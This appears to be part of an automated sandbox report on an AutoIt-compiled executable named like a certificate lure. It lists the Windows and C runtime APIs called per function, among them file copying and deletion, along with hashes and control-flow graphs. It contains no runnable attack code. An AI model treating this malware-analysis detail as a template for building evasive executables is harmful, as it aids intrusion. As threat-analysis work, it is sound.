                                                                              • Opcode ID: da21779078d7d45d6815d1443849b9e42e9075f43c348c7c50b54f33580e51e0
                                                                              • Instruction ID: 6025d747bb8d8d96031e04f11fb247298875d28fb33d9abd7aece3a360e0e379
                                                                              • Opcode Fuzzy Hash: da21779078d7d45d6815d1443849b9e42e9075f43c348c7c50b54f33580e51e0
                                                                              • Instruction Fuzzy Hash: B3112A71200701AFE7219B65EC49F677BB9FBC5B51F10456CF612962A0DB71EC008A31
APIs
• GetFileAttributesW.KERNELBASE(?,00822F49), ref: 007F6CB9
• FindFirstFileW.KERNELBASE(?,?), ref: 007F6CCA
• FindClose.KERNEL32(00000000), ref: 007F6CDA
Memory Dump Source
• Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
• Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
Similarity
• API ID: FileFind$AttributesCloseFirst
• String ID:
• API String ID: 48322524-0
• Opcode ID: bf199d7d4e9179a52c52caee7d7915f9e4cdc67edb7c591bdbf0819d1f2a5591
• Instruction ID: e610d76839e3f1bfc216934eb2d107eda5e88145754883482bb18b7cc4b415db
• Opcode Fuzzy Hash: bf199d7d4e9179a52c52caee7d7915f9e4cdc67edb7c591bdbf0819d1f2a5591
• Instruction Fuzzy Hash: 7DE0D8358145155782106738FC0D4FD776CEA45339F100B06F6B1C22D0E774E90096E6
Strings
Memory Dump Source
• Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
• Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
Similarity
• API ID: Exception@8Throwstd::exception::exception
• String ID: @$P
• API String ID: 3728558374-213525895
• Opcode ID: d78df3b3ef054b1d35f0738aa0daa3712e54ab4029a53870bc999966c5a2badb
• Instruction ID: 0aa561ae43839961a5999f422eb9520b13f3844305c7abc03685768a3ec962a1
• Opcode Fuzzy Hash: d78df3b3ef054b1d35f0738aa0daa3712e54ab4029a53870bc999966c5a2badb
• Instruction Fuzzy Hash: 83727C71A04219DBCB24DF94C495FAEB7B5FF48300F14C05EE90AAB251D739AE85CB91
Strings
Memory Dump Source
• Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
• Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
Similarity
• API ID: BuffCharUpper
• String ID: P
• API String ID: 3964851224-3564208636
• Opcode ID: 60230137cd4f0cfcdb5bf90131763272d4847810ca8a8c9b784f404f940e0e47
• Instruction ID: 4e8b679923c8381c50437ea57e73e369b8910adc44f952895a3a801e7ac76500
• Opcode Fuzzy Hash: 60230137cd4f0cfcdb5bf90131763272d4847810ca8a8c9b784f404f940e0e47
• Instruction Fuzzy Hash: 37922670608241DFD724DF18C484F6ABBE1FF88304F14895DE99A8B262D779ED85CB92
APIs
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 007BE959
• timeGetTime.WINMM ref: 007BEBFA
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 007BED2E
• TranslateMessage.USER32(?), ref: 007BED3F
• DispatchMessageW.USER32(?), ref: 007BED4A
• LockWindowUpdate.USER32(00000000), ref: 007BED79
• DestroyWindow.USER32 ref: 007BED85
• GetMessageW.USER32(?,00000000,00000000,00000000), ref: 007BED9F
• Sleep.KERNEL32(0000000A), ref: 00825270
• TranslateMessage.USER32(?), ref: 008259F7
• DispatchMessageW.USER32(?), ref: 00825A05
• GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00825A19
Strings
Memory Dump Source
• Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
• Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
Similarity
• API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
• String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
• API String ID: 2641332412-570651680
• Opcode ID: 65fd991f63fa37f60351987e7a7061e46bf3d1346a213e8bb84b204edd924aec
• Instruction ID: 2422aa079d91d5d06242f1e0f376cdca6daf571086ff6d407f86dd639926cb9d
• Opcode Fuzzy Hash: 65fd991f63fa37f60351987e7a7061e46bf3d1346a213e8bb84b204edd924aec
• Instruction Fuzzy Hash: 71627070544350DFDB24DF24D889BEA77E4FB44304F14496DF98A8B292DB79E888CB62
APIs
• ___createFile.LIBCMT ref: 007E5EC3
• ___createFile.LIBCMT ref: 007E5F04
• GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 007E5F2D
• __dosmaperr.LIBCMT ref: 007E5F34
• GetFileType.KERNELBASE(00000000,?,?,?,?,?,00000000,00000109), ref: 007E5F47
• GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 007E5F6A
• __dosmaperr.LIBCMT ref: 007E5F73
• CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 007E5F7C
• __set_osfhnd.LIBCMT ref: 007E5FAC
• __lseeki64_nolock.LIBCMT ref: 007E6016
• __close_nolock.LIBCMT ref: 007E603C
• __chsize_nolock.LIBCMT ref: 007E606C
• __lseeki64_nolock.LIBCMT ref: 007E607E
• __lseeki64_nolock.LIBCMT ref: 007E6176
• __lseeki64_nolock.LIBCMT ref: 007E618B
• __close_nolock.LIBCMT ref: 007E61EB
  • Part of subcall function 007DEA9C: CloseHandle.KERNELBASE(00000000,0085EEF4,00000000,?,007E6041,0085EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 007DEAEC
  • Part of subcall function 007DEA9C: GetLastError.KERNEL32(?,007E6041,0085EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 007DEAF6
  • Part of subcall function 007DEA9C: __free_osfhnd.LIBCMT ref: 007DEB03
  • Part of subcall function 007DEA9C: __dosmaperr.LIBCMT ref: 007DEB25
  • Part of subcall function 007D7C0E: __getptd_noexit.LIBCMT ref: 007D7C0E
• __lseeki64_nolock.LIBCMT ref: 007E620D
• CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 007E6342
• ___createFile.LIBCMT ref: 007E6361
• GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 007E636E
• __dosmaperr.LIBCMT ref: 007E6375
• __free_osfhnd.LIBCMT ref: 007E6395
• __invoke_watson.LIBCMT ref: 007E63C3
• __wsopen_helper.LIBCMT ref: 007E63DD
Strings
Memory Dump Source
• Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
• Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
Similarity
• API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
• String ID: @
• API String ID: 3896587723-2766056989
• Opcode ID: 0bf3517af06c98b46ba420a212ac7faca9bd2794a8706ff0392a4ddc471aabe4
• Instruction ID: dc7267b31baab26e630fecd738297469d5f755df5abc678b776d46b2a8d926c0
• Opcode Fuzzy Hash: 0bf3517af06c98b46ba420a212ac7faca9bd2794a8706ff0392a4ddc471aabe4
• Instruction Fuzzy Hash: A0226971A026899FEF299F69CC89BBD7B31FB18368F244229E5119B2D1D33D8D40C751

Control-flow Graph

APIs
• _wcscpy.LIBCMT ref: 007FFA96
• _wcschr.LIBCMT ref: 007FFAA4
• _wcscpy.LIBCMT ref: 007FFABB
• _wcscat.LIBCMT ref: 007FFACA
• _wcscat.LIBCMT ref: 007FFAE8
• _wcscpy.LIBCMT ref: 007FFB09
• __wsplitpath.LIBCMT ref: 007FFBE6
• _wcscpy.LIBCMT ref: 007FFC0B
• _wcscpy.LIBCMT ref: 007FFC1D
• _wcscpy.LIBCMT ref: 007FFC32
• _wcscat.LIBCMT ref: 007FFC47
• _wcscat.LIBCMT ref: 007FFC59
• _wcscat.LIBCMT ref: 007FFC6E
  • Part of subcall function 007FBFA4: _wcscmp.LIBCMT ref: 007FC03E
  • Part of subcall function 007FBFA4: __wsplitpath.LIBCMT ref: 007FC083
  • Part of subcall function 007FBFA4: _wcscpy.LIBCMT ref: 007FC096
  • Part of subcall function 007FBFA4: _wcscat.LIBCMT ref: 007FC0A9
  • Part of subcall function 007FBFA4: __wsplitpath.LIBCMT ref: 007FC0CE
  • Part of subcall function 007FBFA4: _wcscat.LIBCMT ref: 007FC0E4
  • Part of subcall function 007FBFA4: _wcscat.LIBCMT ref: 007FC0F7
Strings
Memory Dump Source
• Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
• Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
Similarity
• API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
• String ID: >>>AUTOIT SCRIPT<<<
• API String ID: 2955681530-2806939583
• Opcode ID: 8b1b45626a92803c1f600d28b4c866e27fc384df794c88ec74ad20d8539f3446
• Instruction ID: e872f852aa8455b82dcc29ce04eecb2b0fa04a7ea96f79bdebecc1fa59115764
• Opcode Fuzzy Hash: 8b1b45626a92803c1f600d28b4c866e27fc384df794c88ec74ad20d8539f3446
• Instruction Fuzzy Hash: 1591A271504309EFDB20EB64C855FAAB3E9BF54310F044869FA5997392DF38E944CB92

Control-flow Graph

APIs
  • Part of subcall function 007FBDB4: __time64.LIBCMT ref: 007FBDBE
  • Part of subcall function 007B4517: _fseek.LIBCMT ref: 007B452F
• __wsplitpath.LIBCMT ref: 007FC083
  • Part of subcall function 007D1DFC: __wsplitpath_helper.LIBCMT ref: 007D1E3C
• _wcscpy.LIBCMT ref: 007FC096
• _wcscat.LIBCMT ref: 007FC0A9
• __wsplitpath.LIBCMT ref: 007FC0CE
• _wcscat.LIBCMT ref: 007FC0E4
• _wcscat.LIBCMT ref: 007FC0F7
• _wcscmp.LIBCMT ref: 007FC03E
  • Part of subcall function 007FC56D: _wcscmp.LIBCMT ref: 007FC65D
  • Part of subcall function 007FC56D: _wcscmp.LIBCMT ref: 007FC670
• DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 007FC2A1
• DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 007FC338
• CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 007FC34E
• DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 007FC35F
• DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 007FC371
Strings
Memory Dump Source
• Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
• Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
Similarity
• API ID: File$Delete$_wcscat_wcscmp$__wsplitpath$Copy__time64__wsplitpath_helper_fseek_wcscpy
• String ID: p1ou`Kpu
• API String ID: 2378138488-1196383048
• Opcode ID: 374314499555407e442d68d2ded865b6a97012fe150541b0f3be686fc6e161ed
• Instruction ID: 0f5be081a1bbdb942ac7b3d77635987151cca2fa6b4d79269bcf80abece1926f
• Opcode Fuzzy Hash: 374314499555407e442d68d2ded865b6a97012fe150541b0f3be686fc6e161ed
• Instruction Fuzzy Hash: 89C11AB1A0021DEADF15DFA4CD85EEEB7BDEF49310F0040AAF609E6251DB749A448F61

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • GetSysColorBrush.USER32(0000000F), ref: 007B3F86
                                                                              • RegisterClassExW.USER32(00000030), ref: 007B3FB0
                                                                              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 007B3FC1
                                                                              • InitCommonControlsEx.COMCTL32(?), ref: 007B3FDE
                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 007B3FEE
                                                                              • LoadIconW.USER32(000000A9), ref: 007B4004
                                                                              • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 007B4013
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                              • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                              • API String ID: 2914291525-1005189915
                                                                              • Opcode ID: 64d50a36c77d2b5bbdff071cf27e239b010f2750916186d147d4e764875964be
                                                                              • Instruction ID: 0863aeaf8b2e7e42d9d35c5decef6093e90a86b7c93e1c9a0b3a349e16a5cd95
                                                                              • Opcode Fuzzy Hash: 64d50a36c77d2b5bbdff071cf27e239b010f2750916186d147d4e764875964be
                                                                              • Instruction Fuzzy Hash: AD21C4B5914318AFDF00DFA8EC8DBCDBBB4FB18710F04461AF625A66A4D7B485848F91

                                                                              Control-flow Graph

                                                                              control_flow_graph 961 7b3742-7b3762 963 7b37c2-7b37c4 961->963 964 7b3764-7b3767 961->964 963->964 967 7b37c6 963->967 965 7b3769-7b3770 964->965 966 7b37c8 964->966 970 7b382c-7b3834 PostQuitMessage 965->970 971 7b3776-7b377b 965->971 968 821e00-821e2e call 7b2ff6 call 7ce312 966->968 969 7b37ce-7b37d1 966->969 972 7b37ab-7b37b3 DefWindowProcW 967->972 1008 821e33-821e3a 968->1008 973 7b37d3-7b37d4 969->973 974 7b37f6-7b381d SetTimer RegisterWindowMessageW 969->974 978 7b37f2-7b37f4 970->978 976 821e88-821e9c call 7f4ddd 971->976 977 7b3781-7b3783 971->977 979 7b37b9-7b37bf 972->979 980 821da3-821da6 973->980 981 7b37da-7b37ed KillTimer call 7b3847 call 7b390f 973->981 974->978 983 7b381f-7b382a CreatePopupMenu 974->983 976->978 1000 821ea2 976->1000 984 7b3789-7b378e 977->984 985 7b3836-7b3840 call 7ceb83 977->985 978->979 993 821da8-821daa 980->993 994 821ddc-821dfb MoveWindow 980->994 981->978 983->978 989 821e6d-821e74 984->989 990 7b3794-7b3799 984->990 1001 7b3845 985->1001 989->972 996 821e7a-821e83 call 7ea5f3 989->996 998 7b379f-7b37a5 990->998 999 821e58-821e68 call 7f55bd 990->999 1002 821dcb-821dd7 SetFocus 993->1002 1003 821dac-821daf 993->1003 994->978 996->972 998->972 998->1008 999->978 1000->972 1001->978 1002->978 1003->998 1004 821db5-821dc6 call 7b2ff6 1003->1004 1004->978 1008->972 1012 821e40-821e53 call 7b3847 call 7b4ffc 1008->1012 1012->972
                                                                              APIs
                                                                              • DefWindowProcW.USER32(?,?,?,?), ref: 007B37B3
                                                                              • KillTimer.USER32(?,00000001), ref: 007B37DD
                                                                              • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 007B3800
                                                                              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 007B380B
                                                                              • CreatePopupMenu.USER32 ref: 007B381F
                                                                              • PostQuitMessage.USER32(00000000), ref: 007B382E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                              • String ID: TaskbarCreated
                                                                              • API String ID: 129472671-2362178303
                                                                              • Opcode ID: c972ee8b243e115f397428a7a38a4ccd0880aa59bb677b1faddc96c205a4aeb7
                                                                              • Instruction ID: 83da1a58794f6b80ac6675185dae2f23ee1d447875d85e18a940ad2312e14456
                                                                              • Opcode Fuzzy Hash: c972ee8b243e115f397428a7a38a4ccd0880aa59bb677b1faddc96c205a4aeb7
                                                                              • Instruction Fuzzy Hash: 2A4125F5200295ABDF145F6CAC8EFFA3695FB50340F100129FA26D25A5DF68DED08762

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • GetSysColorBrush.USER32(0000000F), ref: 007B3E79
                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 007B3E88
                                                                              • LoadIconW.USER32(00000063), ref: 007B3E9E
                                                                              • LoadIconW.USER32(000000A4), ref: 007B3EB0
                                                                              • LoadIconW.USER32(000000A2), ref: 007B3EC2
                                                                                • Part of subcall function 007B4024: LoadImageW.USER32(007B0000,00000063,00000001,00000010,00000010,00000000), ref: 007B4048
                                                                              • RegisterClassExW.USER32(?), ref: 007B3F30
                                                                                • Part of subcall function 007B3F53: GetSysColorBrush.USER32(0000000F), ref: 007B3F86
                                                                                • Part of subcall function 007B3F53: RegisterClassExW.USER32(00000030), ref: 007B3FB0
                                                                                • Part of subcall function 007B3F53: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 007B3FC1
                                                                                • Part of subcall function 007B3F53: InitCommonControlsEx.COMCTL32(?), ref: 007B3FDE
                                                                                • Part of subcall function 007B3F53: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 007B3FEE
                                                                                • Part of subcall function 007B3F53: LoadIconW.USER32(000000A9), ref: 007B4004
                                                                                • Part of subcall function 007B3F53: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 007B4013
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                              • String ID: #$0$AutoIt v3
                                                                              • API String ID: 423443420-4155596026
                                                                              • Opcode ID: 4178b83880b62bf130901ff5afa41ac7606ee5af08d3df24481538a2864c92a3
                                                                              • Instruction ID: b947d357813711ffbb6499721bbe149bb5f59fd0e5e56afc3e4db6694ec93308
                                                                              • Opcode Fuzzy Hash: 4178b83880b62bf130901ff5afa41ac7606ee5af08d3df24481538a2864c92a3
                                                                              • Instruction Fuzzy Hash: 862156B0E00304ABCF10DFADEC4DA99BBF5FB44314F10452AE208A66A4D7758680DFA1

                                                                              Control-flow Graph

                                                                              control_flow_graph 1025 7dacb3-7dace0 call 7d6ac0 call 7d7cf4 call 7d6986 1032 7dacfd-7dad02 1025->1032 1033 7dace2-7dacf8 call 7de880 1025->1033 1034 7dad08-7dad0f 1032->1034 1039 7daf52-7daf57 call 7d6b05 1033->1039 1036 7dad11-7dad40 1034->1036 1037 7dad42-7dad51 GetStartupInfoW 1034->1037 1036->1034 1040 7dad57-7dad5c 1037->1040 1041 7dae80-7dae86 1037->1041 1040->1041 1043 7dad62-7dad79 1040->1043 1044 7dae8c-7dae9d 1041->1044 1045 7daf44-7daf50 call 7daf58 1041->1045 1047 7dad7b-7dad7d 1043->1047 1048 7dad80-7dad83 1043->1048 1049 7dae9f-7daea2 1044->1049 1050 7daeb2-7daeb8 1044->1050 1045->1039 1047->1048 1055 7dad86-7dad8c 1048->1055 1049->1050 1056 7daea4-7daead 1049->1056 1052 7daebf-7daec6 1050->1052 1053 7daeba-7daebd 1050->1053 1057 7daec9-7daed5 GetStdHandle 1052->1057 1053->1057 1058 7dadae-7dadb6 1055->1058 1059 7dad8e-7dad9f call 7d6986 1055->1059 1060 7daf3e-7daf3f 1056->1060 1061 7daf1c-7daf32 1057->1061 1062 7daed7-7daed9 1057->1062 1064 7dadb9-7dadbb 1058->1064 1072 7dada5-7dadab 1059->1072 1073 7dae33-7dae3a 1059->1073 1060->1041 1061->1060 1067 7daf34-7daf37 1061->1067 1062->1061 1065 7daedb-7daee4 GetFileType 1062->1065 1064->1041 1068 7dadc1-7dadc6 1064->1068 1065->1061 1071 7daee6-7daef0 1065->1071 1067->1060 1069 7dadc8-7dadcb 1068->1069 1070 7dae20-7dae31 1068->1070 1069->1070 1074 7dadcd-7dadd1 1069->1074 1070->1064 1075 7daefa-7daefd 1071->1075 1076 7daef2-7daef8 1071->1076 1072->1058 1077 7dae40-7dae4e 1073->1077 1074->1070 1078 7dadd3-7dadd5 1074->1078 1080 7daeff-7daf03 1075->1080 1081 7daf08-7daf1a InitializeCriticalSectionAndSpinCount 1075->1081 1079 7daf05 1076->1079 1082 7dae74-7dae7b 1077->1082 1083 7dae50-7dae72 1077->1083 1084 7dade5-7dae1a InitializeCriticalSectionAndSpinCount 1078->1084 1085 7dadd7-7dade3 GetFileType 1078->1085 1079->1081 1080->1079 1081->1060 1082->1055 1083->1077 1086 7dae1d 1084->1086 1085->1084 1085->1086 1086->1070
                                                                              APIs
                                                                              • __lock.LIBCMT ref: 007DACC1
                                                                                • Part of subcall function 007D7CF4: __mtinitlocknum.LIBCMT ref: 007D7D06
                                                                                • Part of subcall function 007D7CF4: EnterCriticalSection.KERNEL32(00000000,?,007D7ADD,0000000D), ref: 007D7D1F
                                                                              • __calloc_crt.LIBCMT ref: 007DACD2
                                                                                • Part of subcall function 007D6986: __calloc_impl.LIBCMT ref: 007D6995
                                                                                • Part of subcall function 007D6986: Sleep.KERNEL32(00000000,000003BC,007CF507,?,0000000E), ref: 007D69AC
                                                                              • @_EH4_CallFilterFunc@8.LIBCMT ref: 007DACED
                                                                              • GetStartupInfoW.KERNEL32(?,00866E28,00000064,007D5E91,00866C70,00000014), ref: 007DAD46
                                                                              • __calloc_crt.LIBCMT ref: 007DAD91
                                                                              • GetFileType.KERNEL32(00000001), ref: 007DADD8
                                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 007DAE11
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
                                                                              • String ID:
                                                                              • API String ID: 1426640281-0
                                                                              • Opcode ID: 4914d8ac004d687817f934fb9017f6d9f9470cffa4e5922796415dc0627e428e
                                                                              • Instruction ID: d79b39d5362cd9259cb48fcd656f70bb5b52a2eaae6aa08e0a3aaf36c70c8ab9
                                                                              • Opcode Fuzzy Hash: 4914d8ac004d687817f934fb9017f6d9f9470cffa4e5922796415dc0627e428e
                                                                              • Instruction Fuzzy Hash: 4681D2B1905345DFDB14CF68C8856A9BBF0BF45320B24426EE4AAAB3D1D738D842CB56

                                                                              Control-flow Graph

